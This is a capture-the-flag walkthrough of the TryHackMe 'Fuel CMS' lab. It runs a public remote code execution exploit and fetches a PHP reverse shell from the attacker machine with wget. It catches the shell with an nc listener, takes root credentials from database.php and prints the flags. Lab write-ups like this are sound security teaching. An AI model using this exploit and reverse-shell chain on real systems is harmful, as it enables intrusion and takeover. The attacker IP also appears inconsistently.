We will go through the step-by-step process of solving the TryHackMe room titled "Fuel CMS."

Let's dive right in!

Initial Reconnaissance:

Nmap scan report for 10.10.42.50
PORT  STATE SERVICE VERSION
80/tcp open http   Apache httpd 2.4.18 ((Ubuntu))

The Nmap scan revealed that port 80 is open, running an Apache web server on an Ubuntu machine.

Robots.txt

User-agent: *
Disallow: /fuel/

When I visited it, I was redirected to a login page. Using the identified CMS information, I searched for exploits related to Fuel CMS:

$ searchsploit Fuel

Fuel CMS 1.4.1 - Remote Code Execution (3) php/webapps/50477.py

$ searchsploit -m 50477
$ python3 50477.py -u http://10.10.42.50/
[+]Connecting...
Enter Command $pwd
system/var/www/html

I tried different commands in different languages to get a reverse shell but I had no success, so I downloaded a PHP reverse shell from my local machine and accessed it via the browser wget 10.8.5.105/rev.php

$ nc -lnvp 8888           
listening on [any] 8888 ...
connect to [10.8.105.5] from (UNKNOWN) [10.10.42.50] 37380
Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 12:52:32 up 17 min, 0 users, load average: 1.05, 0.86, 0.56
USER    TTY     FROM            LOGIN@  IDLE  JCPU  PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

User Flag:

www-data@ubuntu:/home/www-data$ cat flag.txt
6470****************************

Root Flag:

While exploring further, I found credentials in the database.php file:

'username' => 'root',
'password' => 'mememe',

Armed with the root user credentials, I successfully logged in as the root user and located the root flag:

root@ubuntu:~# cat root.txt
b9bbcb33e11b80be759c4e844862482d